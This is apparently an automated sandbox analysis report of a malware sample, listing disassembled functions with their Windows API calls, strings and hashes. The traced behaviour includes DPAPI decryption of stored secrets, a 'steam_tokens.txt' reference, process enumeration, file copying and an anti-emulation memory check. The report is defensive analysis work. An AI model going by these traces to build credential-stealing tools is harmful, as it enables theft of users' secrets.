Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,042F65E0), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

, xrefs: 004097A3
DPAPI, xrefs: 0040976B

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 2b9c76edc9b258419c7f4614c7dcd789399bcf7f85242a03647ad0e6e1076ea1
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 2b9c76edc9b258419c7f4614c7dcd789399bcf7f85242a03647ad0e6e1076ea1
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 0040684E, 0040679E, 004067C2, 0040689F, 00406884

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,042F0828), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,042F0838), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,042F0868), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: f63b8197388c09f0171e1c296f62c96a59776cbd33401b2079ac3cf9a783bfc4
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: f63b8197388c09f0171e1c296f62c96a59776cbd33401b2079ac3cf9a783bfc4
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,042F0828), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,042F0838), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,042F0868), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: db141857ae5d5c02fff8448f4ee19de15e2a37c00ac90ce392829f9e5a1f652a
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: db141857ae5d5c02fff8448f4ee19de15e2a37c00ac90ce392829f9e5a1f652a
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,042F71A0), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,042F0A18), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6BB73060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BB73095

Part of subcall function 6BB735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BBFF688,00001000), ref: 6BB735D5
Part of subcall function 6BB735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BB735E0
Part of subcall function 6BB735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BB735FD
Part of subcall function 6BB735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BB7363F
Part of subcall function 6BB735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BB7369F
Part of subcall function 6BB735A0: __aulldiv.LIBCMT ref: 6BB736E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BB7309F

Part of subcall function 6BB95B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BB956EE,?,00000001), ref: 6BB95B85
Part of subcall function 6BB95B50: EnterCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95B90
Part of subcall function 6BB95B50: LeaveCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95BD8
Part of subcall function 6BB95B50: GetTickCount64.KERNEL32 ref: 6BB95BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BB730BE

Part of subcall function 6BB730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BB73127
Part of subcall function 6BB730F0: __aulldiv.LIBCMT ref: 6BB73140

Part of subcall function 6BBAAB2A: __onexit.LIBCMT ref: 6BBAAB30

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 3d6a04998aaf35f4bef9bd0303c2721d12223f34602f1ea4cdb55f0935ce29e1
Instruction ID: 39d4cced4036cd185580ed9add6c159bf0b856922a77cce1195dda84c1b9a55a
Opcode Fuzzy Hash: 3d6a04998aaf35f4bef9bd0303c2721d12223f34602f1ea4cdb55f0935ce29e1
Instruction Fuzzy Hash: E1F02D32C25788A7CB20EFB4A8425BE7368EF6B214F505329E85457151FF22E1D4C396

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

